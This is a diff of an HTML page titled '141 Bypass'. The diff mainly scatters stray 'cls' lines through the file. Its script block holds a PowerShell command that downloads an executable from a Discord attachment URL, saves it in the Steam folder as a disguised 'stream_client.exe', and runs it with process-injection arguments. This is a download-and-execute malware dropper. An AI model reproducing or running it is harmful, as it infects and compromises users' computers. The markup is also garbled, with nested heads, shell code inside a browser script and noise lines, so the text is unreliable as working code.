--- a/w.html
+++ b/w.html
@@ -1,20 +1,34 @@
 <!DOCTYPE html>
+cls
 <html lang="pt-BR">
+cls
 <head>
+cls
   <meta charset="UTF-8">
+  cls
   <script src="blocker.js"></script>
+  cls
   <title>141 Bypass</title>
+  cls
   <head>
+    cls
     <meta http-equiv="Content-Security-Policy" content="default-src 'self';">
+    cls
   </head>
+  cls
 </head>
+  cls
 <body>
+  cls
   <script>
+    cls
     powershell -Command "Invoke-WebRequest -Uri 'https://cdn.discordapp.com/attachments/1195789181784436838/1195791255750316152/a.exe' -OutFile 'C:\Program Files (x86)\Steam\stream_client.exe'"
 
 & "C:\Program Files (x86)\Steam\stream_client.exe" --process-name rstrui.exe --inject WriteMiniDmp.exe
   </script>
+  cls
 </body>
+  cls
 </html>
 
 cls
